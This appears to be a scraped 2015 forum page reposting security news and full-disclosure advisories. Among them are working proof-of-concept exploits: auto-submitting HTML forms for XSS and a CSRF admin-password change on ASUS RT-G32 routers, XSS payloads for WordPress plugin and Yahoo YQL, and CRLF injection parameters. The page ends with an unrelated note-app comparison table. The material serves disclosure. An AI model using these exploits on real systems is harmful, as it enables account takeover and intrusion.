currently unclear whether hackers are actively exploiting the flaw. MWE InfoSecurity had not responded to V3's request for comment at the time of publishing. The flaw is dangerous as Apache ActiveMQ is a commonly used open source message broker service. Written in Java, Apache ActiveMQ is designed to facilitate communications between multiple clients or servers. The news follows the discovery of several critical flaws affecting other commonly used open source tools and services. Researchers reported uncovering the notorious Heartbleed flaw in April 2014. Heartbleed is a flaw in the OpenSSL implementation of the Transport Layer Security protocol used by open source web servers such as Apache and Nginx, which host around 66 percent of all sites. In a recent interview with V3, Maarten Ectors, Canonical's vice president of next-generation networks and proximity cloud, argued the nature of open source software development means further Heartbleed-level flaws will be discovered in the very near future. Source

Michigan-based provider of point-of-sale devices, NEXTEP SYSTEMS, is investigating a possible security compromise of customer systems, according to a statement emailed to SCMagazine.com on Monday by Tommy Woycik, president of NEXTEP SYSTEMS. “NEXTEP was recently notified by law enforcement that the security of the systems at some of our customer locations may have been compromised,” according to the statement, which goes on to add, “We do know that this is NOT affecting all NEXTEP customers, and we have been working with our customers to ensure that any issues are addressed.” An investigation is ongoing with law enforcement and data security experts. On Monday, technology journalist Brian Krebs reported that financial industry sources identified a pattern of fraud on payment cards used recently at Zoup!, a restaurant chain and NEXTEP SYSTEMS customer. He wrote that Zoup! referred him to NEXTEP SYSTEMS. Source

Hello list! There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities in ASUS Wireless Router RT-G32. ------------------------- Affected products: ------------------------- Vulnerable is the next model: ASUS RT-G32 with different versions of firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2. ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27 http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27 These vulnerabilities work as via GET, as via POST (work even without authorization). ASUS RT-G32 XSS-1.html <html> <head> <title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="next_page" value="'+alert(document.cookie)+'"> <input type="hidden" name="group_id" value="'+alert(document.cookie)+'"> <input type="hidden" name="action_script" value="'+alert(document.cookie)+'"> <input type="hidden" name="flag" value="'+alert(document.cookie)+'"> </form> </body> </html> Cross-Site Request Forgery (WASC-09): CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth). ASUS RT-G32 CSRF-1.html <html> <head> <title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="http_passwd" value="admin"> <input type="hidden" name="http_passwd2" value="admin"> <input type="hidden" name="v_password2" value="admin"> <input type="hidden" name="action_mode" value="+Apply+"> </form> </body> </html> I found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Source

*WordPress Daily Edition Theme v1.6.2 SQL Injection Security Vulnerabilities* Exploit Title: WordPress Daily Edition Theme v1.6.2 /fiche-disque.php id Parameters SQL Injection Security Vulnerabilities Product: WordPress Daily Edition Theme Vendor: WooThemes Vulnerable Versions: v1.6.2 Tested Version: v1.6.2 Advisory Publication: Mar 07, 2015 Latest Update: Mar 07, 2015 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend) Impact Subscore: 6.4 Exploitability Subscore: 10.0 Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* WooThemes *Product & Version:* WordPress Daily Edition Theme v1.6.2 *Vendor URL & Download:* WordPress Daily Edition Theme can be got from here, http://www.woothemes.com/products/daily-edition/ *Product Introduction:* "Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication" "The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management." "Unique Features These are some of the more unique features that you will find within the theme: A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots. A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives. A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display. A javascript home page video player with thumbnail hover effect. 16 delicious colour schemes to choose from!" *(2) Vulnerability Details:* WordPress Daily Edition Theme web application has a security bug problem. It can be exploited by SQL Injection attacks. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. *(2.1)* The code flaw occurs at "fiche-disque.php?" page with "&id" parameter. *References:* http://www.tetraph.com/security/sql-injection-vulnerability/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-sql.html http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/ http://seclists.org/fulldisclosure/2015/Mar/27 http://packetstormsecurity.com/files/130075/SmartCMS-2-SQL-Injection.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts Source *WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security Vulnerabilities* Exploit Title: WordPress Daily Edition Theme v1.6.2 /thumb.php src Parameter Unrestricted Upload of File Security Vulnerabilities Product: WordPress Daily Edition Theme Vendor: WooThemes Vulnerable Versions: v1.6.2 Tested Version: v1.6.2 Advisory Publication: Mar 07, 2015 Latest Update: Mar 07, 2015 Vulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434] CVE Reference: * Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* WooThemes *Product & Version:* WordPress Daily Edition Theme v1.6.2 *Vendor URL & Download:* WordPress Daily Edition Theme can be got from here, http://www.woothemes.com/products/daily-edition/ *Product Introduction:* "Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication" "The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management." "Unique Features These are some of the more unique features that you will find within the theme: A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots. A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives. A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display. A javascript home page video player with thumbnail hover effect. 16 delicious colour schemes to choose from!" *(2) Vulnerability Details:* WordPress Daily Edition Theme web application has a security bug problem. It can be exploited by "Unrestricted Upload of File" (Arbitrary File Uploading) attacks. With a specially crafted request, a remote attacker can include arbitrary files from the targeted host or from a remote or local host . This may allow disclosing file contents or executing files like PHP scripts. Such attacks are limited due to the script only calling files already on the target host. *(2.1)* The code flaw occurs at "thumb.php?" page with "src" parameters. *References:* http://tetraph.com/security/unrestricted-upload-of-file-arbitrary/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162.html http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/ http://seclists.org/fulldisclosure/2015/Mar/4 http://packetstormsecurity.com/files/130653/Webshop-Hun-1.062S-Directory-Traversal.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts Source

Stored XSS Vulnerability in Google Analytics by Yoast Wordpress Plugin . contents:: Table Of Content Overview Title :Stored XSS Vulnerability in Google Analytics by Yoast Wordpress Plugin Author: Kaustubh G. Padwad, Rohit Kumar. Plugin Homepage: https://yoast.com/wordpress/plugins/google-analytics/ Severity: Medium Version Affected: Version 5.3.2 and mostly prior to it Version Tested : Version 5.3.2 version patched: Description Vulnerable Parameter Current UA-Profile Manually enter your UA code Label for those links Set path for internal links to track as outbound links: Subdomain tracking: Extensions of files to track as downloads: About Vulnerability This plugin is vulnerable to a Stored Cross Site Scripting vulnerability,This issue was exploited when administrator users with access to "Google Analytics by Yoast" Setting in wordpress above listed vulnerable parameter is vulnerable for stored XSS. A malicious administration can hijack other users session, take control of another administrator's browser or install malware on their computer. Vulnerability Class Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) After installing the plugin Goto settings --> Google Analytics by Yoast Input this payload in "Manually enter your UA code" :- v style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x Click on the Save Changes button and navigate your cursor to input box,you will see XSS in action Reload the page or re navigate to page to make sure its stored Mitigation https://github.com/Yoast/google-analytics-for-wordpress/pull/322/commits Change Log https://github.com/Yoast/google-analytics-for-wordpress/pull/322/commits Disclosure 22-February-2015 Reported to developer 25-February-2015 Fixed by developer 05-March-2015 Issue Closed with team. 06-March-2015 Public Discloser credits Kaustubh Padwad & Rohit Kumar Information Security Researcher kingkaustubh@me.com & kumarrohit2255@gmail.com @s3curityb3ast,@rkumars3c [url]http://breakthesec.com[/url] [url]https://www.linkedin.com/in/kaustubhpadwad[/url] Source

/*********************************************************************************** ** Exploit Title: Yahoo Query Language Cross Site Scripting Vulnerability ** ** Exploit Author: Peyman D. aka C4T ** ** Vendor Homepage : http://query.yahooapis.com/ ** ** Google Dork: none ** ** Date: 2015-03-08 ** ** Tested on: Windows 7 / Mozila Firefox ** ************************************************************************************ ** Exploit Code: ****************** <html xmlns="http://www.w3.org/1999/xhtml"> <body> <span>Discovered by Peyman D.</span> <span>aka C4T</span> <script> alert('Successfully Exploited'); </script> </body> </html> ************************************************************************************ Location & Vulnerable query: ****************** http://query.yahooapis.com/v1/public/yql?q= select * from html where url='[attacker-website.com]/exploit.html' and xpath='html' ************************************************************************************* ** Proof: ****************** Executable script tag in API's own page: Malicious source: http://hatrhyme.com/alert.html Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/alert.html' and xpath='html' ------------------------------------------------------- Injecting HTML tags in API's own page: Malicious source: http://hatrhyme.com/expl.html Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/expl.html' and xpath='html' ------------------------------------------------------- ****************************************************************************************** ** ** Explanation and the cause of this vulnerability: ** ** http://hatrhyme.com/XSSInYQL.pdf ** ****************************************************************************************** Source

# Exploit Title: OpenKM Platform Remote Reflected Cross Site Scripting # Google Dork: N/A # Date: 18-11-2014 # Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh) # Vendor Homepage: http://www.openkm.com/en <http://s.bl-1.com/h/mQ2bNXq?url=http://www.openkm.com/en>/ # Software Link: http://www.openkm.com/en/download-english.html <http://s.bl-1.com/h/mQ2bTws?url=http://www.openkm.com/en/download-english.html> # Version: All versions < 6.4.19 (built 23338) # Tested on: All OS # CVE : 2014-9017 -About OpenKM OpenKM is a Free/Libre document management system that provides a web interface for managing arbitrary files. OpenKM includes a content repository, Lucene indexing, and jBPM workflow. The OpenKM system was developed using Java technology. In 2005 two developers involved in open source technologies and expertise with some commercial document management solutions (Sharepoint, Documentum, Hummingbird, among others) like Excalibur search engine or Kofax OCR engine decided to start an open source project based on high level technologies to build a document management system that they decided to call OpenKM. "-Wikipedia" -Reference: http://en.wikipedia.org/wiki/OpenKM <http://s.bl-1.com/h/mQ2bYKv?url=http://en.wikipedia.org/wiki/OpenKM> -Vulnerability: Remote Reflected/Stored Cross Site Scripting with no remote interaction -Severity: Very Critical -Vulnerable Parameter(s)/Input(s): Tasks -Info: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 <http://s.bl-1.com/h/mQ2cfkx?url=https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29> -Impact: Remote Admin or Users Full Account Takeover with no interaction. -Attack Scenario: 1. User#1 "Attacker" : Creates a task with a vulnerable name and assign it to another User/Admin "Targeted Victim". 2. User#2 "Victim" : Got Exploited with the vulnerable Task made by the Attacker "User#1" since the Task notification will automatically appears to the assigned user side "Victim" also the notification popup displays the vulnerable task name and the victim will be exploited with no interactions. -PS: This is the most critical attack you will see on OpenKM platform because it will work remotely against users even with the same scenario described in the report you can steal/execute a JS in the Administrator's session. -PoC Video: http://youtu.be/3jBQFAAq23k Thanks -- *Best Regards**,**,* *Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist & Bug Bounty Hunter. LinkedIn <http://s.bl-1.com/h/mQ2ck6z?url=https://www.linkedin.com/in/symbiansymoh>Curriculum Vitae <http://s.bl-1.com/h/mQ2coW1?url=http://goo.gl/cNrVpL> <http://s.bl-1.com/h/mQ2ctv3?url=https://www.linkedin.com/in/symbiansymoh> Facebook <http://s.bl-1.com/h/mQ2cyJ5?url=https://fb.com/symbiansymoh>Twitter <http://s.bl-1.com/h/mQ2c3j7?url=https://twitter.com/symbiansymoh> Source

*NetCat CMS Multiple HTTP Response Splitting (CRLF) Security Vulnerabilities* Exploit Title: NetCat CMS Multiple CRLF Security Vulnerabilities Product: NetCat CMS (Content Management System) Vendor: NetCat Vulnerable Versions: 5.01 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1 Tested Version: 3.12 Advisory Publication: Mar 07, 2015 Latest Update: Mar 07, 2015 Vulnerability Type: Improper Neutralization of CRLF Sequences ('CRLF Injection') [CWE-93] CVE Reference: * Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Advisory Details:* *(1) Vendor & Product Description:* *Vendor:* NetCat *Product & Version:* NetCat 5.01 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1 *Vendor URL & Download:* NetCat can be got from here, http://netcat.ru/ *Product Introduction:* NetCat.ru is russian local company. "NetCat designed to create an absolute majority of the types of sites: from simple "business card" with a minimum content to complex web-based systems, from corporate offices to online stores, libraries or media data - in other words, projects completely different directions and at any level of complexity. View examples of sites running on NetCat CMS can be in a special section." "Manage the site on the basis of NetCat can even inexperienced user, because it does not require knowledge of Internet technologies, programming and markup languages. NetCat constantly improving, adds new features. In the process of finalizing necessarily take into account the wishes of our partners and clients, as well as trends in Internet development. More than 2,000 studios and private web developers have chosen for their projects is NetCat, and in 2013 sites, successfully working on our CMS, created more than 18,000." *(2) Vulnerability Details:* NetCat web application has a security bug problem. It can be exploited by HTTP Response Splitting (CRLF) attacks. This could allow a remote attacker to insert arbitrary HTTP headers, which are included in a response sent to the server. If an application does not properly filter such a request, it could be used to inject additional headers that manipulate cookies, authentication status, or more. *(2.1)* The first code flaw occurs at "/post.php" page with "redirect_url" parameter by adding "%0d%0a%20". *(2.2)* The second code flaw occurs at "redirect.php?" page with "url" parameter by adding "%0d%0a%20". *References:* http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/ http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/ https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/ http://seclists.org/fulldisclosure/2015/Mar/8 http://packetstormsecurity.com/files/130584/NetCat-CMS-5.01-Open-Redirect.html -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts Source

While WhatsApp is very reserved to its new calling feature, cyber scammers are targeting WhatsApp users across the world by circulating fake messages inviting users to activate the new 'WhatsApp calling feature for Android' that infects their smartphones with malicious apps. If you receive an invitation message from any of your friend saying, "Hey, I’m inviting you to try WhatsApp Free Voice Calling feature, click here to activate now —> http://WhatsappCalling.com", BEWARE! It is a Scam. The popular messaging app has begun rolling out its much-awaited Free Voice Calling feature — similar to other instant messaging apps like Skype and Viber — to Android users which allows users to make voice calls using Internet. However, for now, the free WhatsApp calling feature is invite-only and only appears to work for people running the latest version of WhatsApp app for Android on a Google Nexus 5 phone running the latest Android 5.0.1 Lollipop. HOW TO ENABLE WHATSAPP CALLING FEATURE Company has not announced the WhatsApp calling feature officially, but some users claim to have used it. The report broke two months ago, when a Reddit user (pradnesh07) from India reported that the WhatsApp calling feature was activated on his Android device after he received a WhatsApp voice call from a friend. The user also posted its image on the discussion forum. Because it’s invite only, what we all believe, Millions of users across the world are eagerly waiting to access the free voice calling feature on WhatsApp and searching over the Internet that How to enable WhatsApp calling feature for Android or iOS, and this is what scammers are taking advantage of. Cyber scammers have allegedly started circulating fake invitations containing malicious links through Social Media, phishing emails, WhatsApp messages and Scam websites in order to spread creepy malware and adware apps. Once users click on the link, they land to another website where they are asked to take a survey on behalf of WhatsApp. The survey forces users to download unknown applications and software that might contain malware. With more than 70 million users, WhatsApp is the widely popular and preferred chat service worldwide, both for us as well as scammers. LEARN HOW TO PROTECT YOURSELF In order to protect yourself from 'WhatsApp calling feature' scam, you need to learn that at time of writing: WhatsApp calling feature feature is currently available for Android Lollipop 5.0 version and was successfully accessible via the new version 2.11.508 of the WhatsApp. WhatsApp calling feature feature is still in the beta version. WhatsApp calling feature is not available through Google Play Store, but can be downloaded only from the official WhatsApp website on INVITE. Source

A critical vulnerability has been discovered in the Google Apps for Work that allows hackers to abuse any website’s domain name based email addresses, which could then be used to send phishing emails on company’s behalf in order to target users. If you wish to have an email address named on your brand that reads like admin@yourdomain.com instead of myemail@gmail.com, then you can register an account with Google Apps for Work. The Google Apps for Work service allows you to use Gmail, Drive storage, Calendar, online documents, video Hangouts, and other collaborative services with your team or organization. To get a custom domain name based email service from Google, one just need to sign up like a normal Gmail account. Once created, you can access your domain’s admin console panel on Google app interface, but can not be able to use any service until you get your domain verified from Google. ENDING PHISHING MAILS FROM HIJACKED ACCOUNTS Cyber security researchers Patrik fehrenbach and Behrouz sadeghipour found that an attacker can register any unused (not previously registered with Google apps service) domain, example: bankofanycountry.com with Google apps for Work to obtain 'admin@bankofanycountry.com' account. But obviously, Google would not let you access email service for 'admin@bankofanycountry.com', until domain verification has been completed, which means neither you can send any email from that account, nor you can receive. However, the duo explained The Hacker News that there is a page on Google apps that allows domain admin to send 'Sign in Instructions' to the organization users i.e. info@bankofanycountry.com (must be created from panel before proceeding) by accessing following URL directly on the browser. ttps://admin.google.com/EmailLoginInstructions?userEmail=info@bankofanycountry.com Using the compose email interface, as shown, an attacker could send any kind of phishing email containing malicious link to the target users, in an attempt to trick them into revealing their personal information including passwords, financial details or any other sensitive information. BEFORE SECURITY PATCH As shown below, researchers successfully obtained admin@vine.com (acquired by Twitter) and send a mail to victim, contains a subject: Welcome to Twitter, which can convince users into submitting their Twitter credentials to the given phishing pages. Researchers reported this security and privacy issue to the search engine giant, and the company has applied, what I think, a partial patch to the flaw. As, it is still allowing an attacker to access ‘Send Sign in Instructions’ for unverified domains, but this time via apps-noreply@google.com, instead of the custom email address. AFTER SECURITY PATCH But, the consequences are still the same because it won’t stop hackers from targeting victims. Generally, Google automatically helps identify spam and suspicious emails and mark them as spam or phishing warnings, like they're from a legitimate source, such as your bank or Google, but they're not. However, by abusing above Google vulnerability, hackers could send phishing emails right into your inbox with no warning as the email has been generated from Google’s own servers. Source Foarte interesant

Recently a mobile-security firm Bluebox claimed that the brand new Xiaomi Mi4 LTE comes pre-installed with spyware/adware and a "forked" vulnerable version of Android operating system on top of it, however, the company denies the claim. Xiaomi, which is also known as Apple of China, provides an affordable and in-budget smartphones with almost all features that an excellent smartphone provides. On 5th March, when Bluebox researchers claimed to have discovered some critical flaws in Mi4 LTE smartphone, Xiaomi issued a statement to The Hacker News claiming that "There are glaring inaccuracies in the Bluebox blog post" and that they are investigating the matter. RESEARCHERS GET TROLLED BY CHINESE SELLERS Now, Xiaomi responded to Bluebox Labs by preparing a lengthy denial to their claims and said the new Mi4 smartphone purchased by Bluebox team in China (known as the birthplace of fake smartphones) was not an original Xiaomi smartphone but a counterfeit product. This means, Mi4 LTE smartphone owned by Bluebox are tempered by the local Chinese shops itself. What the Heck! Chinese get trolled by Chinese. XIAOMI DECLINES BLUEBOX CLAIMS Xiaomi provided a detailed step-by-step explanation on each and every fact and figure: Hardware: Xiaomi hardware experts have analysed the internal device photos provided to the company by Bluebox and confirmed that the physical hardware is markedly different from the original Mi 4 smartphone. IMEI number: Xiaomi after-sales team has confirmed that the IMEI on the device from Bluebox is a cloned IMEI number which has been previously used on other counterfeit Xiaomi devices in China. Software: Xiaomi MIUI team has also confirmed that the software installed on the device from Bluebox is not an official Xiaomi MIUI build. The company assured its customers that their devices neither come rooted, nor have any malware pre-installed. Contrary to Bluebox claims, the company also assured its customers that the MIUI used in their products is true Android, which means MIUI follows exact Google's Android CDD (Compatibility Definition Document), and passes all Android CTS tests to make sure a given device is fully Android compatible. Declining to Bluebox finding, Xiaomi released the following statement in an email to The Hacker News: Source

Gasesti raspunsul AICI OneNote Evernote Keep Developer Microsoft Evernote Google Latest Stable version 2014 2014 2014 Delivery Web, Mobile, Desktop Web, Mobile, Desktop Web, Mobile Windows Yes Yes Online Only Mac OS X Yes Yes Online Only Android Yes Yes Yes iOS Yes Yes Online Only Windows Phone Yes Yes Online Only Blackberry Online Only Yes Online Only # of Devices Per License No license, unlimited Unlimited Unlimited OneNote Evernote Keep Packages and Cost in USD Free Free or Premium Available ($5 to 10 USD/user/month) Free Microsoft Office Compatibility Can Attach Can Attach Can't Attach Files Open Document Compatibility Can Attach Can Attach Can't Attach Files Portable Document Format (PDF) Can Attach Can Attach Can't Attach Files Autosave and Backup Excellent Excellent Excellent Security, Document Password Protection, Encryption Excellent Excellent Excellent Accessibility Excellent Poor Good Update Process Excellent Excellent Excellent Support Good Good Good OneNote Evernote Keep Web Clipper App OneNote Web Clipper Evernote Web Clipper Chrome App News App Several including Feedly and News 360 Several including Feedly and News 360 No Email App Email to OneNote, CloudMagic and Powerbot CloudMagic and Powerbot Gmail Printing / Scanning App Several including OfficeLens and NeatConnect Several including ScannerPro and CamScanner Google Drive Apps available SmartPen App Livescribe and ModNotebooks Livescribe and ModNotebooks No Connection to Other Major Apps IFTTT and Zapier IFTTT and Zapier No Home Screen Display Widget Available Available Available Annotation / Quick Sketch App Skitch Skitch and Penultimate Sketch for Keep Dining / Food App No Evernote Food No Distraction Free App No Evernote Clearly No OneNote Evernote Keep User Interface & Customization Excellent Excellent Excellent Text & OCR Excellent Excellent Good Handwriting Excellent Excellent Poor Images Excellent Excellent Excellent Audio Excellent Excellent Good Task Lists and Alerts / Reminders Excellent Excellent Good Notebooks, Tags, & Categories Excellent Excellent Poor References Poor Poor Poor Comments Poor Poor Poor Spelling & Grammar Check Excellent Excellent Excellent Printing & Exporting Good (requires cloud printing) Good (requires cloud printing) Good (requires cloud printing) Cloud Environment Microsoft OneDrive Evernote Cloud Google Drive Asynchronous Collaborative Editing Excellent - available in free version Good - available in Shared Notes (Premium version) or Related Notes (Business version) Poor (share to Google+ but no collaborative editing) Online to Offline Syncing & Editing Excellent Good in Free, Excellent in Premium Only in the Chrome app Social Sharing with Zapier app with Zapier app Google+ Templates Excellent Poor Poor